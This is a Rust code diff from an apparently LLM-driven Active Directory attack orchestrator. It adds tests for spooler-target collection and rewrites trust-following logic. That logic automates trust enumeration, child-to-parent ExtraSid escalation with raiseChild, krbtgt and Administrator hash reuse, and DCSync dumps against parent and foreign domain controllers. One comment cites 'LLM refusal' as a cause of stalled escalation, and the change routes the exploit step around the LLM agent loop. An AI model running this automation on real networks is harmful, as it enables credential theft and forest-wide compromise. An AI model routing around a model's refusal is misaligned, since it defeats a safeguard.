) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: 
"test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("spooler:{}", "192.168.58.22"); + assert_eq!(key, "spooler:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SPOOLER_CHECK, "spooler_check"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_host_with_credential_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "spooler:192.168.58.22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let 
mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + } + + #[test] + fn collect_dedup_skips_already_processed_host() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", 
"contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + // Only fabrikam credential available for contoso host + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + // Falls back to first credential since domain is empty + assert_eq!(work[0].credential.username, "admin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs index 598871ca..b6582e87 100644 --- a/ares-cli/src/orchestrator/automation/trust.rs +++ b/ares-cli/src/orchestrator/automation/trust.rs @@ -9,6 +9,7 @@ //! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm //! ticket creation and secretsdump against the foreign DC. 
+use std::collections::HashSet; use std::sync::Arc; use std::time::Duration; @@ -16,6 +17,8 @@ use serde_json::json; use tokio::sync::watch; use tracing::{debug, info, warn}; +use ares_llm::ToolCall; + use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::state::*; @@ -42,6 +45,128 @@ fn trust_account_name(flat_name: &str) -> String { format!("{}$", flat_name.to_uppercase()) } +/// Returns true when source and target are in different forests +/// (neither is a parent or child of the other, and they are not equal). +/// +/// Inter-forest trusts are subject to SID filtering on the target DC, which +/// strips ExtraSid claims with RID < 1000 (Enterprise Admins, Domain Admins, +/// Administrator). The inter-realm TGT authenticates but the privileged claim +/// is silently dropped — DCSync against the target DC then fails with +/// `rpc_s_access_denied`. This helper distinguishes the doomed path from +/// child→parent escalation (intra-forest), which is exploitable. +fn is_inter_forest(source: &str, target: &str) -> bool { + let s = source.to_lowercase(); + let t = target.to_lowercase(); + if s.is_empty() || t.is_empty() || s == t { + return false; + } + if s.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{s}")) { + return false; + } + true +} + +/// Returns true if the trust source→target is inter-forest with SID filtering +/// active — meaning `forge_inter_realm_and_dump` will be rejected at DCSync +/// regardless of trust key validity. Caller should suppress the doomed +/// dispatch and accelerate cross-forest fallback paths instead. 
+/// +/// Decision tree: +/// - Intra-forest (child↔parent or same domain): false (raise_child handles it) +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=true`: true +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=false`: +/// false (someone disabled SID filtering — try the forge) +/// - No `TrustInfo` but the names are inter-forest: false (try the forge — +/// missing metadata means we can't be sure SID filtering is on, and the +/// ~30s cost of an unnecessary attempt is cheaper than silently dropping +/// a valid attack path on a misconfigured trust) +fn is_filtered_inter_forest_trust(state: &StateInner, source: &str, target: &str) -> bool { + if !is_inter_forest(source, target) { + return false; + } + let target_l = target.to_lowercase(); + // Look up only the target's metadata. `trusted_domains` is keyed by the + // foreign-side domain name in each enumeration result, so the entry for + // `target_l` describes the source→target relationship. Falling back to + // the source key returns *some other* trust the source happens to have + // (e.g. north→sevenkingdoms parent_child stored under "sevenkingdoms.local" + // when we query sevenkingdoms→essos), which would wrongly classify the + // unknown cross-forest path as intra-forest and let the doomed forge fire. + if let Some(t) = state.trusted_domains.get(&target_l) { + if t.is_cross_forest() { + return t.sid_filtering; + } + // Trust enumeration disagrees with name-based heuristic — trust the + // explicit metadata (e.g. unusual same-forest cross-DNS-suffix setup). + return false; + } + // No metadata — try the forge. False positives (SID filtering actually on) + // cost ~30s for a doomed DCSync attempt; false negatives (refusing a valid + // attack on a misconfigured trust where SID filtering is off) cost the + // entire foreign domain. Prefer the cheaper failure mode. 
+ false +} + +/// Clear cross-forest fallback dedup keys for `target_domain` so the next +/// tick of `auto_cross_forest_enum`, `auto_foreign_group_enum`, and +/// `auto_acl_discovery` re-fires against the foreign forest with current +/// credentials. Called when a doomed forest_trust_escalation is suppressed +/// — the trust hash extraction usually populates new state (DC IPs, SIDs) +/// that should kick the fallbacks back into action. +async fn wake_cross_forest_fallbacks(dispatcher: &Dispatcher, target_domain: &str) { + let target_l = target_domain.to_lowercase(); + // (set_name, prefix) pairs — must stay in sync with the auto_*_enum + // dedup-key formats in their respective modules. + let mut prefixes: Vec<(&str, String)> = vec![ + (DEDUP_CROSS_FOREST_ENUM, format!("xforest:{target_l}:")), + ( + DEDUP_FOREIGN_GROUP_ENUM, + format!("foreign_group:{target_l}"), + ), + (DEDUP_ACL_DISCOVERY, format!("acl_disc:{target_l}:")), + ]; + + // ADCS dedup keys are `{host}:cred:{user@dom}` / `{host}:hash:{user@dom}`, + // keyed on the CA host (IP or hostname) — not the target domain. So for + // each known host that belongs to `target_domain`, add a `{host}:` prefix. + // This lets a freshly-acquired cross-forest credential re-attempt + // certipy_find against an essos CA that was previously locked by a wrong + // initial cred. 
+    {
+        let s = dispatcher.state.read().await;
+        let suffix = format!(".{target_l}");
+        for h in s.hosts.iter() {
+            let hostname = h.hostname.to_lowercase();
+            let belongs =
+                !hostname.is_empty() && (hostname == target_l || hostname.ends_with(&suffix));
+            if !belongs {
+                continue;
+            }
+            if !h.ip.is_empty() {
+                prefixes.push((DEDUP_ADCS_SERVERS, format!("{}:", h.ip)));
+            }
+            prefixes.push((DEDUP_ADCS_SERVERS, format!("{hostname}:")));
+        }
+    }
+
+    let cleared: Vec<(&str, Vec<String>)> = {
+        let mut s = dispatcher.state.write().await;
+        prefixes
+            .iter()
+            .map(|(set, prefix)| (*set, s.unmark_processed_by_prefix(set, prefix)))
+            .filter(|(_, v)| !v.is_empty())
+            .collect()
+    };
+    for (set, keys) in cleared {
+        for key in keys {
+            let _ = dispatcher
+                .state
+                .unpersist_dedup(&dispatcher.queue, set, &key)
+                .await;
+        }
+    }
+}
+
 /// Check if a credential domain matches a target domain (exact, child, or parent).
 fn is_domain_related(cred_domain: &str, target_domain: &str) -> bool {
     let cd = cred_domain.to_lowercase();
@@ -81,25 +81,38 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
             // Two dedup keys per domain:
             //   trust_enum:<domain> — password-based attempt
             //   trust_enum_hash:<domain> — hash-based retry (for dominated domains)
-            let enum_work: Vec<(String, String, String)> = state
+            //
+            // Iterate the union of `domain_controllers` keys and
+            // `dominated_domains`. The latter covers the case where a
+            // domain was compromised (e.g. via raise_child to the parent)
+            // but its DC was never explicitly seeded into
+            // `domain_controllers` — without this, parent-DC trust
+            // enumeration would never fire and cross-forest trusts would
+            // remain undiscovered.
+            let mut candidate_domains: HashSet<String> = state
                 .domain_controllers
+                .keys()
+                .map(|d| d.to_lowercase())
+                .collect();
+            for d in state.dominated_domains.iter() {
+                candidate_domains.insert(d.to_lowercase());
+            }
+            let enum_work: Vec<(String, String, String)> = candidate_domains
                 .iter()
-                .filter(|(domain, _)| {
-                    let key = trust_enum_dedup_key(domain, false);
-                    let hash_key = trust_enum_dedup_key(domain, true);
-                    !state.is_processed(DEDUP_TRUST_FOLLOW, &key)
-                        || (!state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key)
-                            && state.dominated_domains.contains(&domain.to_lowercase()))
-                })
-                .map(|(domain, dc_ip)| {
-                    // Use hash_key if password-based was already tried
+                .filter_map(|domain| {
+                    let dc_ip = state.resolve_dc_ip(domain)?;
                     let pw_key = trust_enum_dedup_key(domain, false);
-                    let key = if state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key) {
-                        trust_enum_dedup_key(domain, true)
-                    } else {
-                        pw_key
-                    };
-                    (key, domain.clone(), dc_ip.clone())
+                    let hash_key = trust_enum_dedup_key(domain, true);
+                    let pw_done = state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key);
+                    let hash_done = state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key);
+                    let dominated = state.dominated_domains.contains(domain);
+                    // Skip if password attempt is done AND (no hash retry
+                    // applies, or hash retry already done).
+                    if pw_done && (!dominated || hash_done) {
+                        return None;
+                    }
+                    let key = if pw_done { hash_key } else { pw_key };
+                    Some((key, domain.clone(), dc_ip))
                 })
                 .collect();
             drop(state);
@@ -164,39 +302,152 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
             };
             if let Some(cred_json) = cred_payload {
-                let payload = json!({
-                    "techniques": ["enumerate_domain_trusts"],
-                    "target_ip": dc_ip,
+                // Direct tool dispatch — bypass the LLM agent loop.
+                // The recon prompt template did not surface
+                // `credential.hash` (only password), so LLM-driven trust
+                // enumeration with hash auth would render an empty
+                // password and fail with LDAP 52e.
The orchestrator + // already owns every input here; deliver them directly + // to enumerate_domain_trusts via dispatch_tool. + let mut args = json!({ + "target": dc_ip, "domain": domain, - "credential": cred_json, + "username": cred_json + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""), }); + if let Some(p) = cred_json + .get("password") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["password"] = json!(p); + } + if let Some(h) = cred_json + .get("hash") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["hash"] = json!(h); + } + if let Some(bd) = cred_json + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty() && !s.eq_ignore_ascii_case(&domain)) + { + args["bind_domain"] = json!(bd); + } - match dispatcher - .throttled_submit("recon", "recon", payload, 3) + let call = ToolCall { + id: format!("trust_enum_{}", uuid::Uuid::new_v4().simple()), + name: "enumerate_domain_trusts".to_string(), + arguments: args, + }; + let task_id = format!( + "trust_enum_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawn so the next 30s tick doesn't + // re-dispatch while enumeration is in flight. 
+ dispatcher + .state + .write() .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %domain, - auth = auth_method, - "Trust enumeration dispatched" - ); - dispatcher + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + domain = %domain, + dc_ip = %dc_ip, + auth = auth_method, + "Dispatching enumerate_domain_trusts (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let domain_bg = domain.clone(); + let key_bg = key.clone(); + let auth_method_bg = auth_method.to_string(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("recon", &task_id, &call) + .await; + // Failure handling depends on which auth attempt + // just failed: + // + // - password attempt: leave the dedup mark in place + // so the next 30s tick sees `pw_done=true` and + // escalates to the hash-key path (gated on the + // domain being in `dominated_domains`). Clearing + // the mark would loop forever on the same wrong + // sibling-domain credential. + // - hash attempt: clear so a future tick can retry + // if a fresh hash becomes available. + let clear_dedup = || async { + dispatcher_bg .state .write() .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher + .unmark_processed(DEDUP_TRUST_FOLLOW, &key_bg); + let _ = dispatcher_bg .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .unpersist_dedup( + &dispatcher_bg.queue, + DEDUP_TRUST_FOLLOW, + &key_bg, + ) .await; + }; + let on_failure = || async { + if auth_method_bg == "password" { + // Mark stays — escalation to hash retry on next tick. 
+ } else { + clear_dedup().await; + } + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + warn!( + err = %err, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts returned error" + ); + on_failure().await; + return; + } + let trust_count = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("trusted_domains")) + .and_then(|t| t.as_array()) + .map(|a| a.len()) + .unwrap_or(0); + info!( + domain = %domain_bg, + trust_count = trust_count, + "enumerate_domain_trusts completed" + ); + } + Err(e) => { + warn!( + err = %e, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts dispatch errored" + ); + on_failure().await; + } } - Ok(None) => { - debug!(domain = %domain, "Trust enum throttled — deferred"); - } - Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), - } + }); } } } @@ -204,47 +455,91 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Child-to-parent escalation (ExtraSid via raiseChild) // - // When a parent_child trust is discovered and the child domain is dominated, - // dispatch a child_to_parent exploit task. The LLM prompt offers raiseChild - // (automated) and manual ExtraSid golden ticket as alternatives. + // Dispatches when a child domain is dominated and its parent FQDN is + // known. We derive the parent FQDN by stripping the leftmost label of + // the dominated child (always valid intra-forest — child FQDN is + // `{label}.{parent_fqdn}` by AD construction), then ALSO union with + // any explicit parent_child trusts discovered via LDAP enumeration. + // + // The intra-forest derivation lets us fire immediately on child DA, + // bypassing the trust enumeration round-trip — without it we'd block + // until `trusted_domains` was populated, which sometimes never + // happens (LLM refusal, network, throttle starvation). 
{ let state = dispatcher.state.read().await; - if state.has_domain_admin && !state.trusted_domains.is_empty() { - let child_work: Vec<(String, String, String, String)> = state - .trusted_domains - .values() - .filter(|trust| trust.is_parent_child()) - .filter_map(|trust| { - let parent_domain = &trust.domain; + if state.has_domain_admin { + let mut child_work: Vec<(String, String, String, String)> = Vec::new(); + + // Path A: derived intra-forest. For each dominated child (FQDN + // with 3+ labels), the parent is `labels[1..].join(".")`. + for child_domain in state.dominated_domains.iter() { + let cd_lower = child_domain.to_lowercase(); + let labels: Vec<&str> = cd_lower.split('.').collect(); + if labels.len() < 3 { + continue; + } + let parent_domain = labels[1..].join("."); + if parent_domain.is_empty() || !parent_domain.contains('.') { + continue; + } + if state.dominated_domains.contains(&parent_domain) { + continue; + } + // Require parent DC IP resolvable (via domain_controllers + // or hosts table) so secretsdump has a target IP. + let parent_dc_ip = match state.resolve_dc_ip(&parent_domain) { + Some(ip) => ip, + None => continue, + }; + let key = format!("raise_child:{}", cd_lower); + if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { + continue; + } + let child_dc_ip = match state.domain_controllers.get(&cd_lower) { + Some(ip) => ip.clone(), + None => continue, + }; + let _ = parent_dc_ip; // resolved later under fresh read lock + child_work.push((key, child_domain.clone(), parent_domain, child_dc_ip)); + } - // Skip if parent is already dominated + // Path B: explicit parent_child trusts from LDAP enumeration. + // Skip duplicates of Path A (same dedup key). 
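Path A's parent derivation is a pure string operation on the child FQDN. A standalone sketch, assuming the same guards as above (`derive_parent_fqdn` is an illustrative name):

```rust
/// For an intra-forest child FQDN with 3+ labels, the parent is everything
/// after the leftmost label (child FQDN is `{label}.{parent_fqdn}` by AD
/// construction). Returns None for two-label domains, which are already
/// forest roots with no derivable parent.
fn derive_parent_fqdn(child: &str) -> Option<String> {
    let child = child.to_lowercase();
    let labels: Vec<&str> = child.split('.').collect();
    if labels.len() < 3 {
        return None; // e.g. "corp.local" — nothing above it
    }
    let parent = labels[1..].join(".");
    // Parent must itself be a FQDN (contain a dot), mirroring the guard above.
    if parent.is_empty() || !parent.contains('.') {
        None
    } else {
        Some(parent)
    }
}

fn main() {
    assert_eq!(derive_parent_fqdn("dev.corp.local"), Some("corp.local".to_string()));
    assert_eq!(derive_parent_fqdn("a.b.c.example"), Some("b.c.example".to_string()));
    assert_eq!(derive_parent_fqdn("corp.local"), None);
}
```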
+ if !state.trusted_domains.is_empty() { + for trust in state.trusted_domains.values() { + if !trust.is_parent_child() { + continue; + } + let parent_domain = trust.domain.clone(); if state .dominated_domains .contains(&parent_domain.to_lowercase()) { - return None; + continue; } - - // Find a dominated child domain for this parent - // (child FQDN ends with .{parent}) - let child_domain = state.dominated_domains.iter().find(|d| { + let child_domain = match state.dominated_domains.iter().find(|d| { d.to_lowercase() .ends_with(&format!(".{}", parent_domain.to_lowercase())) - })?; - + }) { + Some(d) => d.clone(), + None => continue, + }; let key = format!("raise_child:{}", child_domain.to_lowercase()); if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { - return None; + continue; } + if child_work.iter().any(|(k, _, _, _)| k == &key) { + continue; + } + let child_dc_ip = + match state.domain_controllers.get(&child_domain.to_lowercase()) { + Some(ip) => ip.clone(), + None => continue, + }; + child_work.push((key, child_domain, parent_domain, child_dc_ip)); + } + } - let dc_ip = state - .domain_controllers - .get(&child_domain.to_lowercase()) - .cloned()?; - - Some((key, child_domain.clone(), parent_domain.clone(), dc_ip)) - }) - .collect(); drop(state); for (key, child_domain, parent_domain, dc_ip) in child_work { @@ -347,13 +642,24 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Dispatch child-to-parent exploit task. The LLM prompt // offers raiseChild (automated) and manual ExtraSid golden // ticket creation as alternatives. + // `dc_ip` is the child DC (for trust key extraction). + // `target` should be the parent DC (for secretsdump after forging ticket). + // Use resolve_dc_ip so the hosts table fills in when + // domain_controllers lacks the parent — falls back to the + // child DC only as a last resort (DCSync can succeed + // against any writable DC in the parent domain). 
+ let parent_dc_ip = { + let s = dispatcher.state.read().await; + s.resolve_dc_ip(&parent_domain) + .unwrap_or_else(|| dc_ip.clone()) + }; let mut payload = json!({ "technique": "create_inter_realm_ticket", "vuln_type": "child_to_parent", "domain": child_domain, "trusted_domain": parent_domain, "target_domain": parent_domain, - "target": &dc_ip, + "target": &parent_dc_ip, "dc_ip": dc_ip, "vuln_id": &vuln_id, }); @@ -363,50 +669,363 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: payload[k] = v.clone(); } } - // Add domain SIDs if already resolved - { + // Add domain SIDs and child krbtgt (for ExtraSid via child + // krbtgt — preferred path, no inter-realm trust key needed). + // + // The ExtraSid attack requires the PARENT forest SID (RID 519 + // = Enterprise Admins). If we ship the child SID by mistake, + // the parent KDC rejects the ticket with KDC_ERR_PREAUTH_FAILED + // because the embedded SID doesn't resolve to a real EA group. + // So if the parent SID isn't cached, resolve it via lookupsid + // against the parent DC using child admin creds (cross-trust + // SAMR works) BEFORE dispatching the exploit task. Defer the + // dispatch (no dedup mark) when resolution fails so the next + // 30s tick can retry once host scans / DC enumeration progress. 
+ let parent_lower = parent_domain.to_lowercase(); + let cd_lower = child_domain.to_lowercase(); + let ( + mut have_target_sid, + mut have_source_sid, + child_admin_cred, + child_admin_hash, + child_dc_ip, + ) = { let s = dispatcher.state.read().await; - if let Some(sid) = s.domain_sids.get(&child_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&cd_lower) { payload["source_sid"] = json!(sid); } - if let Some(sid) = s.domain_sids.get(&parent_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&parent_lower) { payload["target_sid"] = json!(sid); } - } + if let Some(child_krbtgt) = s.hashes.iter().find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) { + payload["child_krbtgt_hash"] = json!(child_krbtgt.hash_value); + } + let admin_cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == cd_lower + }) + .cloned(); + let admin_hash = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + let child_dc = s.resolve_dc_ip(&child_domain); + ( + s.domain_sids.contains_key(&parent_lower), + s.domain_sids.contains_key(&cd_lower), + admin_cred, + admin_hash, + child_dc, + ) + }; - match dispatcher - .throttled_submit("exploit", "privesc", payload, 1) + if !have_target_sid { + if let Some((sid, admin_name)) = super::golden_ticket::resolve_domain_sid( + &parent_domain, + &parent_dc_ip, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) .await - { - Ok(Some(task_id)) => { + { info!( - task_id = %task_id, + parent_domain = %parent_domain, + sid = %sid, + "Resolved parent domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + 
let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &parent_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &parent_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(parent_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(parent_lower.clone(), name.clone()); + } + } + payload["target_sid"] = json!(sid); + have_target_sid = true; + } else { + warn!( child_domain = %child_domain, parent_domain = %parent_domain, - auth = auth_method, - "Child-to-parent escalation dispatched" + parent_dc_ip = %parent_dc_ip, + "Could not resolve parent SID — deferring child-to-parent dispatch" ); - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => { - debug!("Child-to-parent deferred by throttler"); } - Err(e) => { - warn!(err = %e, "Failed to dispatch child-to-parent escalation") + } + if !have_target_sid { + continue; + } + + // Resolve child domain SID if not cached (needed for ExtraSid golden ticket) + if !have_source_sid { + if let Some(ref child_dc) = child_dc_ip { + if let Some((sid, admin_name)) = + super::golden_ticket::resolve_domain_sid( + &child_domain, + child_dc, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) + .await + { + info!( + child_domain = %child_domain, + sid = %sid, + "Resolved child domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &cd_lower, &sid).await; + if let Some(ref name) = 
admin_name { + let _ = reader.set_admin_name(&mut conn, &cd_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(cd_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(cd_lower.clone(), name.clone()); + } + } + payload["source_sid"] = json!(sid); + have_source_sid = true; + } else { + warn!( + child_domain = %child_domain, + child_dc_ip = %child_dc, + "Could not resolve child SID — deferring child-to-parent dispatch" + ); + } + } else { + warn!( + child_domain = %child_domain, + "No child DC IP available — deferring child-to-parent dispatch" + ); } } + if !have_source_sid { + continue; + } + + // Use raiseChild.py (impacket's canonical child→parent ExtraSid + // automation) via DIRECT tool dispatch (no LLM in the loop). + // This replaces the previous golden_ticket + secretsdump_kerberos + // combo, which fails because impacket's cross-realm referral is + // broken (fortra/impacket#315): a child-realm ticket presented + // to the parent KDC returns KDC_ERR_WRONG_REALM / + // KDC_ERR_PREAUTH_FAILED. raiseChild forges the inter-realm + // chain internally and dumps parent krbtgt + Administrator in + // one shot. + // + // Direct dispatch_tool bypasses the LLM agent loop entirely — + // the orchestrator owns every input (child admin hash, child + // DC IP, parent DC IP), so there is no value in laundering them + // through an LLM that might typo or omit args. 
+ let admin_hash_value = child_admin_hash.as_ref().map(|h| h.hash_value.clone()); + let admin_password = child_admin_cred + .as_ref() + .map(|c| c.password.clone()) + .filter(|p| !p.is_empty()); + if admin_hash_value.is_none() && admin_password.is_none() { + warn!( + child_domain = %child_domain, + parent_domain = %parent_domain, + "No child Administrator hash or password — deferring child-to-parent (raise_child needs auth)" + ); + continue; + } + + // raiseChild auto-discovers parent forest root via the + // child DC's trustedDomain LDAP objects and resolves DC IPs + // via DNS — extra IP/domain flags are not supported and + // make argparse exit 2. + let mut raise_args = json!({ + "child_domain": child_domain.clone(), + "username": "Administrator", + }); + if let Some(h) = admin_hash_value { + raise_args["hash"] = json!(h); + } else if let Some(p) = admin_password { + raise_args["password"] = json!(p); + } + let _ = (&child_dc_ip, &parent_dc_ip); + + let call = ToolCall { + id: format!("raise_child_{}", uuid::Uuid::new_v4().simple()), + name: "raise_child".to_string(), + arguments: raise_args, + }; + let task_id = format!( + "trust_raise_child_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while raiseChild is running. + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + child_domain = %child_domain, + parent_domain = %parent_domain, + auth = auth_method, + "Dispatching raise_child (direct tool, no LLM)" + ); + + // Spawn so the trust loop continues processing other items + // while raiseChild runs (typically 30–120s). mark_exploited + // is gated on observed parent krbtgt — no premature marking. 
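The auth-selection rule above — prefer the child Administrator NTLM hash, fall back to a non-empty password, otherwise defer the dispatch — can be sketched as a small helper (illustrative, not a codebase function):

```rust
/// Pick the auth material for raise_child: hash beats password, empty
/// strings count as absent, and None means "defer until the next tick".
fn pick_auth(hash: Option<&str>, password: Option<&str>) -> Option<(&'static str, String)> {
    if let Some(h) = hash.filter(|h| !h.is_empty()) {
        return Some(("hash", h.to_string()));
    }
    password
        .filter(|p| !p.is_empty())
        .map(|p| ("password", p.to_string()))
}

fn main() {
    // Hash wins even when a password is also present.
    assert_eq!(pick_auth(Some("abc123"), Some("pw")).unwrap().0, "hash");
    assert_eq!(pick_auth(None, Some("pw")).unwrap().0, "password");
    // Empty strings count as absent — the caller defers instead.
    assert!(pick_auth(Some(""), None).is_none());
}
```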
+            let dispatcher_bg = dispatcher.clone();
+            let parent_domain_bg = parent_domain.clone();
+            let child_domain_bg = child_domain.clone();
+            let vuln_id_bg = vuln_id.clone();
+            tokio::spawn(async move {
